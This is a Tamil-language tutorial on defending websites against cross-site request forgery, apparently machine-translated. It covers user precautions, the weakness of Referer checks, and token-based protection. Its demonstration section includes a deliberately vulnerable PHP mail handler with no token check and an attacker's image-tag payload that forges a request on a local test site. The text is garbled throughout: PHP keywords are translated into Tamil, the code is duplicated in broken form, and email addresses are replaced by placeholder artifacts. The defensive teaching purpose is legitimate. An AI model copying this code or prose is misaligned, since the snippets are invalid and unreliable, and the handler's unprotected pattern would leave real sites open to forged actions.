பொதுவாக, CSRF ஒரு பாதிப்பு அல்ல, அது ஒரு வகையான தாக்குதல் என்பதை உங்களுக்கு நினைவூட்ட விரும்புகிறேன். மேலும் இந்த தாக்குதல் இணைய பயன்பாட்டின் இறுதிப் பயனரின் மீது பாதிப்பைப் பயன்படுத்தி மேற்கொள்ளப்படுகிறது இந்த விண்ணப்பம், "கோரிக்கையின் மூலத்தின் சரியான சரிபார்ப்பு இல்லாமை" என்று அழைக்கப்படலாம் (நானே பெயரைக் கொண்டு வந்தேன், கண்டிப்பாக தீர்ப்பளிக்க வேண்டாம், ஆனால் அது உண்மைதான்). ஆனால் இனிமேல் நான் CSRF ஐ ஒரு பாதிப்பு மற்றும் தாக்குதலானது எளிமையானது என்பதால் ஒரு தாக்குதலை அழைக்கிறேன், மேலும் இது ஏற்றுக்கொள்ளப்படும் வழி =)

மற்றும் பயனர் மீது தாக்குதல் நடத்தப்படுவதால், பயனர் தன்னைத் தற்காத்துக் கொள்ள வேண்டும்... வேடிக்கையாக =) எந்தவொரு பயனரும் அவர் பயன்படுத்தும் எந்தத் தளத்திலும் (இந்தத் தளங்கள் இல்லாவிட்டாலும் கூட) இந்தத் தாக்குதலின் சாத்தியத்தை குறைக்க முடியும் என்பதே உண்மை. CSRF க்கு எதிராக உள்ளமைக்கப்பட்ட பாதுகாப்பு). ஆனால் பயனர்களுக்கு கூடுதலாக, தள உருவாக்குநர்கள் தங்கள் பயனர்கள் மீது இந்த தாக்குதலை நடத்துவதற்கான வாய்ப்பைத் தடுக்கும் வகையில் தங்கள் பயன்பாட்டை வடிவமைக்க முடியும்.

இரு தரப்பிலிருந்தும் பாதுகாப்பைப் பார்ப்போம்.

பயனர் பாதுகாப்பு

பொதுவாக, இங்கே எல்லாம் மிகவும் சாதாரணமானது:

• மூன்றாம் தரப்பினரால் உங்களுக்கு வழங்கப்படும் இணைப்புகளைக் கிளிக் செய்ய வேண்டாம். இது மிகவும் சாதாரணமான அறிவுரை, அனைவருக்கும் இது ஏற்கனவே தெரியும் என்று நினைக்கிறேன், ஆனால் மீண்டும் ஒருமுறை சொல்ல முடிவு செய்தேன்.
• ஒரு குறிப்பிட்ட தளத்துடன் பணிபுரிந்த பிறகு அங்கீகாரத்தை நீக்கவும். பாதிப்பு ஏற்பட்டாலும், தாக்குபவர் உங்கள் சார்பாக இலக்கு தளத்தில் செயல்களைச் செய்ய முடியாது.
• முக்கியமான தளங்களுடன் பணிபுரிய தனி உலாவி அல்லது “தனிப்பட்ட அல்லது அநாமதேய முறைகள்” பயன்படுத்தவும் (ஒவ்வொரு தளத்திற்கும் ஒரு உலாவியைப் பயன்படுத்தவும் ^_^ அல்லது இன்னும் சிறப்பாக, தனி கணினி: D).

அவ்வளவுதான். இப்போது முக்கிய விஷயத்திற்கு செல்லலாம்.

டெவலப்பர் பாதுகாப்பு

ஏற்கனவே குறிப்பிட்டுள்ளபடி, கோரிக்கையின் ஆதாரத்தின் சரியான சரிபார்ப்பு இல்லாததால் பாதிப்பு உள்ளது. அதாவது, ஒரு பயன்பாட்டை உருவாக்கும்போது, ​​இந்த மூலத்தைச் சரிபார்க்கும் செயல்பாட்டை நாம் உருவாக்க வேண்டும். மேலும் நம் நினைவுக்கு வரும் முதல் விஷயம் என்ன? சரி! பரிந்துரையாளர் காசோலை.

பரிந்துரையாளர் காசோலை

கட்டுரைகளை குறுக்காக படிப்பவர்களுக்கு உடனே சொல்கிறேன். இந்த தலைப்பைச் சரிபார்ப்பதில் மட்டுமே உங்கள் பாதுகாப்பை அடிப்படையாகக் கொண்டது மோசமானது(!). ஏன் - கீழே பார்க்கவும்.

முதலில், இந்த முறை என்ன என்பதைக் கண்டுபிடிப்போம்.

நாங்கள் HTTP நெறிமுறையைப் பயன்படுத்தி வலைத்தளங்களுடன் வேலை செய்கிறோம். இந்த நெறிமுறையின் ஒவ்வொரு பாக்கெட்டும் தலைப்புகள் + பாக்கெட் உள்ளடக்கங்களின் தொகுப்பாகும். இந்த தலைப்புகளில் ஒன்று Referer. இது பரிந்துரை மூலத்தின் முகவரியைக் கொண்டுள்ளது. ஒரு அற்பமான உதாரணம்: உங்களிடம் தளம் A திறக்கப்பட்டுள்ளது, இந்தத் தளத்தில் நீங்கள் B தளத்திற்கான இணைப்பைக் கிளிக் செய்கிறீர்கள், இந்த நேரத்தில், நீங்கள் கோரிக்கையை வைக்கும் போது, ​​பரிந்துரையாளர் தலைப்பில் தள A இன் முகவரி இருக்கும். அதாவது, பயனர் எங்கிருந்து வந்தார் என்பதைக் கண்காணிப்பதற்கான சிறந்த வழிமுறை இது என்று தோன்றுகிறது.

இங்கே குதிரைவாலி. மேலும் இங்குள்ள விஷயம் என்னவென்றால், பரிந்துரைப்பவர் போலியாக இருக்க முடியும் என்பதல்ல (புத்திசாலித்தனமான ஹேக்கர் பாதிக்கப்பட்டவரிடம் பரிந்துரைப்பவரை மாற்றி, குறிப்பிட்ட இணைப்பைப் பின்தொடரச் சொல்வார்). உண்மை என்னவென்றால், எனது புள்ளிவிவரங்களின்படி, சுமார் 5% பயனர்கள் பரிந்துரையாளர் பரிமாற்றத்தை முடக்கியுள்ளனர். அதாவது, இந்த ஐந்து சதவிகிதத்தினர் தளத்துடன் வேலை செய்ய முடியாது, அல்லது இந்த தாக்குதலுக்கு அவர்கள் பாதிக்கப்படுவார்கள் (உங்கள் விண்ணப்பத்தின் கொள்கையைப் பொறுத்து).

ஆமாம், ஆமாம், ஆமாம், நீங்கள் என்ன நினைக்கிறீர்கள் என்று எனக்குத் தெரியும்... சரி, இந்த 5% என்ன? அவர்கள் பாதிக்கப்படக்கூடியவர்களாக இருக்கட்டும், ஆனால் மீதமுள்ள 95% பாதுகாக்கப்படுகிறது, அதே நேரத்தில் உங்களுக்கு குறைந்த இரத்தம் செலவாகும். அதாவது, பரிந்துரைப்பவர் எங்கள் விண்ணப்பத்தின் முகவரியைக் கொண்டிருந்தாலோ அல்லது காலியாக இருந்தாலோ, ஆதாரத்தை உறுதிப்படுத்தியதாகக் கருதுகிறோம். இதோ மீண்டும் குதிரைவாலி வருகிறது! பாதிக்கப்பட்டவரின் உலாவியை பரிந்துரைப்பவரைக் குறிப்பிடாமல் கோரிக்கையை நிறைவேற்றும்படி கட்டாயப்படுத்த விருப்பங்கள் உள்ளன (நான் இதைப் பற்றி எழுதினேன்)! மற்றும் வோய்லா! எல்லா பயனர்களும் இன்னும் பாதிக்கப்படக்கூடியவர்கள் என்று மாறிவிடும்.

பொதுவாக ஒரு சுயாதீனமான முறையாக இந்த முறைஅர்த்தமற்றது.

செயல் உறுதிப்படுத்தல்

நீங்கள் ஒவ்வொரு சமர்ப்பிப்புப் படிவத்திலும் ஒரு கேப்ட்சாவை இணைத்து, CSRF இலிருந்து காப்பாற்ற, பதிவு செய்த பயனர்களுக்குக் கூட காட்டலாம்... இருப்பினும், அத்தகைய அமைப்பில் பணிபுரிவதை விட, ஹேக்கருக்கு எனது கணக்கை வழங்க விரும்புகிறேன்...

டோக்கன்கள்

சரி, இப்போது ஒரே சரியான மற்றும் நம்பகமான வழி.

பொருள் இந்த முறைஒவ்வொரு இணைப்பிலும் சில "டோக்கன்கள்" கொண்ட அளவுருவைச் சேர்ப்பது, சமர்ப்பிப்பு படிவம் போன்றவை. ஒரு கோரிக்கையைப் பெறும்போது, ​​ஏற்றுக்கொள்ளப்பட்ட அளவுருக்களில் இந்த டோக்கன் இருப்பதை சர்வர் சரிபார்க்க வேண்டும். இயற்கையாகவே, ஒவ்வொரு பயனருக்கும் ஒவ்வொரு டோக்கனும் தனிப்பட்டதாக இருக்க வேண்டும், மேலும் ஒவ்வொரு டோக்கனும் தனிப்பட்டதாக இருந்தால் இன்னும் சிறப்பாக இருக்கும்.

செயல்படுத்துவதற்கான எளிய மற்றும் நம்பகமான எடுத்துக்காட்டுகளில் ஒன்று - ஒவ்வொரு கோரிக்கையிலும் ஒரு புதிய டோக்கன் உருவாக்கப்பட்டு பயனரின் குக்கீகளில் நிறுவப்பட்டு பக்கத்தில் உள்ள படிவங்கள் மற்றும் இணைப்புகளின் அளவுருக்களிலும் சேர்க்கப்படுகிறது:

பின்னர், ஒவ்வொரு கோரிக்கையையும் பெறும்போது, ​​குக்கீகளின் டோக்கன் படிவ அளவுருக்களில் குறிப்பிடப்பட்டுள்ள டோக்கனுடன் ஒப்பிடப்படுகிறது. மேலும் அவை ஒரே மாதிரியாக இருந்தால், கோரிக்கையின் ஆதாரம் சட்டப்பூர்வமானது. பின்னர் டோக்கன் மீண்டும் உருவாக்கப்பட்டு, மீண்டும் குக்கீயில் அமைக்கப்படும். சுற்று.

பொதுவாக, செயல்படுத்தல் வேறுபட்டதாக இருக்கலாம், ஆனால் பிரச்சனை என்னவென்றால், டோக்கன்களுக்கு மாறுவது மிகவும் கடினமாக உள்ளது, ஏனெனில் நீங்கள் ஒவ்வொரு இணைப்பையும், ஒவ்வொரு படிவத்தையும், ஒவ்வொரு பக்கத்தையும் கணக்கில் எடுத்துக்கொள்ள வேண்டும்... முக்கியமான பக்கங்கள்/படிவங்கள்/இணைப்புகளை மட்டுமே நீங்கள் பாதுகாக்க முடியும், ஆனால் பின்னர் அவர்களில் சிலவற்றை இழக்க வாய்ப்பு உள்ளது.

நான் தனிப்பட்ட முறையில் POST படிவங்களையும் மிக முக்கியமான இணைப்புகளையும் மட்டுமே பாதுகாக்கிறேன். அதாவது, எனது விண்ணப்பங்களில் உள்ள POST சரியான டோக்கன் இல்லாமல் வேலை செய்யாது. இது சில வடிவங்களைப் பாதுகாக்க மறந்துவிடும் வாய்ப்பை நீக்குகிறது, ஏனெனில் அது வேலை செய்யாது, நான் அதை உடனே கவனிப்பேன்.

முடிவுரை

CSRF தாக்குதல்களில் இருந்து உங்களை எவ்வாறு பாதுகாத்துக் கொள்வது என்பதை இந்தக் கட்டுரையிலிருந்து நீங்கள் புரிந்துகொள்வீர்கள் என்று நம்புகிறேன்.

ஆசிரியரிடமிருந்து: இந்த பாடத்தை பதிவு செய்வதற்கான காரணம், எங்கள் மன்றத்தில் ஒரு கேள்வி, இது போல் ஒலித்தது: CSRF தாக்குதல்களில் இருந்து வலைத்தளத்தை எவ்வாறு பாதுகாப்பது? நிச்சயமாக, நாங்கள் உடனடியாக இந்த தலைப்பில் பதிலளித்தோம் மற்றும் பாதுகாப்பு பொறிமுறையை செயல்படுத்த ஒரு சிறிய வழிமுறையை வழங்கினோம். ஆனால் பெரும்பாலும் எங்கள் வாசகர்கள் அனைவரும் மன்றத்தைப் படிக்காததால், மேலே உள்ள பிரச்சினையில் ஒரு தனி பாடத்தை பதிவு செய்ய முடிவு செய்தேன்.

தற்போதைய வீடியோ தேவையான இணையதளத்தில் செயல்படுத்தக்கூடிய முழுமையான ஆயத்த தீர்வை வழங்காது என்பதை உடனடியாக கவனிக்க விரும்புகிறேன். ஏனெனில் உங்களில் ஒவ்வொருவருக்கும் ஒரு தனித்துவம் கொண்ட இணையதளம் உள்ளது அல்லது இருக்கும் தருக்க அமைப்பு, அதாவது, மற்றவர்களிடமிருந்து முற்றிலும் வேறுபட்டது, அதாவது எல்லாவற்றையும் முழுமையாகக் கவனித்து, ஆயத்த பாதுகாப்பு ஸ்கிரிப்டை உருவாக்குவது சாத்தியமில்லை. சாத்தியமான விருப்பங்கள்செயல்படுத்தல்.

இது தேவையில்லை, ஏனெனில் பாதுகாப்பு பொறிமுறையின் சாராம்சம் மிகவும் எளிமையானது, எனவே தற்போதைய வீடியோவில், ஒரு சோதனை தளத்தின் உதாரணத்தைப் பயன்படுத்தி, மேலே உள்ள தாக்குதலிலிருந்து உங்களை எவ்வாறு பாதுகாத்துக் கொள்வது என்பதை நீங்கள் காண்பீர்கள், பின்னர், பெறப்பட்ட அறிவின் அடிப்படையில், உங்கள் சொந்த திட்டத்தில் இதே போன்ற நடவடிக்கைகளை எடுப்பீர்கள். எனவே ஆரம்பிக்கலாம்.

CSRF என்பது கிராஸ்-சைட் ரிக்வெஸ்ட் ஃபோர்ஜரி என்ற ஆங்கில வார்த்தைகளிலிருந்து உருவான சுருக்கமாகும், அதாவது குறுக்கு-தள கோரிக்கை மோசடி. இந்த கால 2001 இல் பீட்டர் வாட்கின்ஸ் அவர்களால் நீண்ட காலத்திற்கு முன்பு அறிமுகப்படுத்தப்பட்டது, ஆனால் மக்கள் 1988 இல் இதுபோன்ற சாத்தியமான தாக்குதல்களைப் பற்றி பேசத் தொடங்கினர். ஏற்கனவே போதுமான அளவு நேரம் கடந்துவிட்டது, ஆனால் இன்னும் பெரும்பாலான இணைய வலைத்தளங்கள் இந்தத் தாக்குதலுக்கு உட்பட்டுள்ளன என்பதை நினைவில் கொள்ளவும். கேள்வி உடனடியாக எழுகிறது - இது ஏன்? பதில் மிகவும் எளிமையானது மற்றும் CSRF தாக்குதல்களுக்கு பாதிப்பு என்பது பயன்பாட்டுக் குறியீட்டில் உள்ள பிழை அல்ல, ஆனால் உலாவி மற்றும் இணைய சேவையகத்தின் முற்றிலும் இயல்பான செயல்பாட்டின் விளைவாகும்.

தாக்குதலின் சாராம்சம் என்னவென்றால், தாக்குபவர் மற்றொரு பதிவு செய்யப்பட்ட (அங்கீகரிக்கப்பட்ட) பயனரின் சார்பாக பாதுகாப்பற்ற இணையதளத்தில் பல்வேறு செயல்களைச் செய்ய முடியும். வேறு வார்த்தைகளில் கூறுவதானால் இந்த வகைதாக்குதலானது தாக்குபவர்களின் வலைத்தளத்தைப் பார்வையிடும் பயனரை உள்ளடக்கியது, இதன் விளைவாக, அவர் கவனிக்காமல், இந்த பயனர் இருக்கும் மற்றொரு இணையதளம் அல்லது சேவையில் சில முன் வரையறுக்கப்பட்ட செயல்கள் செய்யப்படுகின்றன. இந்த நேரத்தில்அங்கீகரிக்கப்பட்டது.

இந்த வழக்கில், ஒரு விதியாக, CSRF தாக்குதல்களின் இலக்குகள் குறிப்பிட்ட செயல்களைச் செய்யும் பல்வேறு ஊடாடும் வலை பயன்பாடுகள், எடுத்துக்காட்டாக, மின்னஞ்சல் அனுப்புவதற்கான சேவைகள், பல்வேறு மன்றங்கள், கட்டண அமைப்புகள் போன்றவை. அதாவது, ஒரு ஹேக்கர் மற்ற பயனர்களின் சார்பாக சில செயல்களைச் செய்ய முடியும் - செய்திகளை அனுப்புதல், புதிய கணக்குகளைச் சேர்ப்பது, நிதி பரிவர்த்தனைகளை மேற்கொள்வது போன்றவை.

இப்போது சோதனை தளத்தின் உதாரணத்தில் இந்த தாக்குதலின் விளைவைப் பார்ப்போம்.

அனுப்புவதே வேலை என்று ஒரு இணையதளம் இருக்கிறது என்று வைத்துக் கொள்வோம் மின்னஞ்சல்அங்கீகரிக்கப்பட்ட பயனரின் சார்பாக குறிப்பிட்ட முகவரியில். அதாவது, அன்று முகப்பு பக்கம்ஒரு செய்தியை அனுப்புவதற்கான படிவத்தைப் பார்க்கிறோம். மேலும், GET கோரிக்கை வழியாக சில அளவுருக்களை அனுப்பும் போது செய்திகளை அனுப்புவதற்கான ஒரு வழிமுறையும் உள்ளது (உதாரணமாக). உள்நுழைவு பக்கம் இதுபோல் தெரிகிறது:

இந்த பக்கம்மிகவும் சாதாரணமானது, ஆனால் உலாவி குக்கீகளில் அங்கீகாரத் தரவைச் சேமிக்கப் பயன்படும் "உறுப்பினர்" தேர்வுப்பெட்டி உங்கள் கண்ணைக் கவரும். உண்மையில் இந்த பொறிமுறைபயனர்களுக்கு மிகவும் வசதியானது, ஏனெனில் இது பக்கத்தை மீண்டும் மீண்டும் அணுகுவதை எளிதாக்குகிறது, ஆனால் பாதுகாப்புக் கண்ணோட்டத்தில் மிகவும் விரும்பத்தகாதது. ஆனால் இன்னும், பார்வையாளர்களுக்காக, சில சலுகைகள் அடிக்கடி செய்யப்பட வேண்டும்.

இரண்டு முறைகளைப் பயன்படுத்தி செய்திகளை அனுப்புவதற்கான குறியீடு (GET மற்றும் POST) இது போன்றது:

//ஒரு செய்தியை அனுப்பினால்($this->isGet() && !empty($_GET["email"])) ( $body = "வணக்கம் இது செய்தி படிவம் - ".$this->பயனர்["பெயர்"] ; $body .= " உள்ளடக்கம் - GET - ".$_GET["content"].." இருந்து - ".$_GET["email"]; mail(" [மின்னஞ்சல் பாதுகாக்கப்பட்டது]","புதிய செய்தி",$body); ) if($this->isPost()) ($body = "வணக்கம் இது செய்தி வடிவம் - ".$this->user["name"]; $body .= " உள்ளடக்கம் - இடுகையிலிருந்து - ".$_POST["உள்ளடக்கம்"]. "இருந்து - ".$_POST["மின்னஞ்சல்"]; அஞ்சல்(" [மின்னஞ்சல் பாதுகாக்கப்பட்டது]","புதிய செய்தி",$உடல்);)

//செய்தி அனுப்ப என்றால் ($ this -> isGet () && ! காலியாக ( $ _GET [ "email" ] ) ) ( $உடல் = . $ இது -> பயனர் [ "பெயர்" ] ; $உடல். = "உள்ளடக்கம் - GET இலிருந்து -" . $_GET["உள்ளடக்கம்"]. "இருந்து -". $_GET["மின்னஞ்சல்"]; என்றால் ($திஸ் -> isPost()) ( $body = "ஹலோ இது செய்தி வடிவம் - " . $ இது -> பயனர் [ "பெயர்" ] ; $உடல். = "உள்ளடக்கம் - இடுகையிலிருந்து -" . $_POST["உள்ளடக்கம்"]. "இருந்து -". $_POST["மின்னஞ்சல்"]; அஞ்சல்(" [மின்னஞ்சல் பாதுகாக்கப்பட்டது]", "புதிய செய்தி", $body);

இப்போது, ​​மற்றொரு தளத்தைப் பார்ப்போம் - ஒரு ஹேக்கரின் தளம்.

ஒரு GET கோரிக்கையின் மீது தாக்குதல் நடத்துவது அவசியமானால், அவர் மிகவும் எளிமையான ஆனால் மிகவும் பயனுள்ள குறியீட்டை வைக்கலாம்:

< img src = "http://localhost/csrf/[மின்னஞ்சல் பாதுகாக்கப்பட்டது]&content=Hello world" >

அதாவது, சாராம்சத்தில், நாம் ஒரு img குறிச்சொல்லைப் பார்க்கிறோம், அதன் src பண்புக்கூறு தாக்கப்படுவதற்கு நோக்கம் கொண்ட தளத்திற்கான பாதையைக் கொண்டுள்ளது, ஒரு குறிப்பிட்ட செயலைச் செய்ய தேவையான அளவுருக்கள். எங்கள் விஷயத்தில், இது ஒரு செய்தியை அனுப்புகிறது, அதாவது இப்போது தாக்குபவர் பயனரை தற்போதைய தளத்திற்கு மட்டுமே ஈர்க்க வேண்டும், மேலும் அவருக்குத் தெரியாமல், ஆர்வமுள்ள தளத்திற்கு ஒரு கோரிக்கை வைக்கப்படும், ஏனெனில் உலாவி ஏற்ற முயற்சிக்கும். படம், src பண்புக்கூறில் குறிப்பிடப்பட்டுள்ள பாதை. அதே நேரத்தில், உலாவி குக்கீகள் அங்கீகாரத் தரவைச் சேமித்து வைத்திருப்பதை நாங்கள் நினைவில் கொள்கிறோம், நிச்சயமாக, பயன்பாடு உடனடியாக அவற்றைப் பயன்படுத்துகிறது, அதன்படி, மேலே உள்ள கோரிக்கை சேவையகத்தால் வெற்றிகரமாக செயல்படுத்தப்படும். இதன் பொருள் பயனரின் சார்பாக ஒரு செய்தி அனுப்பப்படும்.

கோரிக்கையுடன் அனுப்பப்படும் தலைப்புகளின் தொகுப்பைப் பார்த்தால், உண்மையில், உள்நுழைவுத் தரவுகளுடன் குக்கீகளை நாம் பார்க்கலாம் கணக்கு, நிச்சயமாக அதாவது - மேலே குறிப்பிட்டுள்ளபடி - கோரிக்கை அங்கீகரிக்கப்பட்ட பயனரிடமிருந்து வந்ததாக உணரப்படும்.

கோரிக்கையை அனுப்பும் அதே நிலைதான். POST முறை, இந்த விஷயத்தில் மட்டுமே, தாக்குபவர் தனது இணையதளத்தில் ஒரு படிவத்தை உருவாக்குவார், அது பார்வையாளர் இந்தத் தளத்தில் நுழைந்தவுடன் தானாகவே JavaScript ஐப் பயன்படுத்தி அனுப்பப்படும்.

எனவே, இந்த வகையான தாக்குதல்களில் இருந்து உங்களைப் பாதுகாத்துக் கொள்வது மிகவும் அவசியம் பயனுள்ள முறைபாதுகாப்பு என்பது சிறப்பு டோக்கன்களின் பயன்பாடு ஆகும்.

பாதுகாப்பு டோக்கன் என்பது ஒரு குறிப்பிட்ட பயனருக்காக தோராயமாக உருவாக்கப்பட்ட ஒரு சரம் மற்றும் தரவை மாற்றுவதை உள்ளடக்கிய ஒவ்வொரு கோரிக்கையிலும் அனுப்பப்படுகிறது. கூடுதலாக, டோக்கனும் அமர்வில் சேமிக்கப்படுகிறது. எனவே, பாதுகாப்பின் சாராம்சம் கோரிக்கையில் அனுப்பப்படும் டோக்கனின் கடிதப் பரிமாற்றம் மற்றும் அமர்வில் சேமிக்கப்பட்ட டோக்கனின் எளிய சோதனைக்கு வருகிறது. இரண்டு டோக்கன்களும் ஒரே மாதிரியாக இருந்தால், அங்கீகரிக்கப்பட்ட பயனரால் கோரிக்கை அனுப்பப்பட்டது. டோக்கன்கள் பொருந்தவில்லை என்றால், அல்லது கோரிக்கையில் டோக்கன் இல்லை என்றால், ஒரு தாக்குதல் நடத்தப்படுகிறது என்று நாம் மிகுந்த நம்பிக்கையுடன் தீர்மானிக்க முடியும், அதாவது எந்த செயலையும் செய்ய முடியாது.

குறிப்பிட்ட செயல்களை மாற்றுவதையோ அல்லது செய்வதையோ இலக்காகக் கொண்ட அனைத்து கோரிக்கைகளும் கண்டிப்பாக பாதுகாக்கப்பட வேண்டும் என்பதை நினைவில் கொள்ளவும்.

உண்மையில், இந்த கட்டத்தில், பாடத்தின் உரை பகுதி முடிந்தது மற்றும் வீடியோ பதிப்பில் கொடுக்கப்பட்ட தலைப்பைப் பற்றி தொடர்ந்து பேசுவோம். அதே நேரத்தில், டோக்கன்களை உருவாக்குவதற்கான முறைகளை நாங்கள் கருத்தில் கொள்வோம் மற்றும் மேலே விவரிக்கப்பட்ட பாதுகாப்பு வழிமுறையை நடைமுறையில் செயல்படுத்துவோம். இப்போது விடைபெறுவோம். மகிழ்ச்சியான குறியீட்டு!!!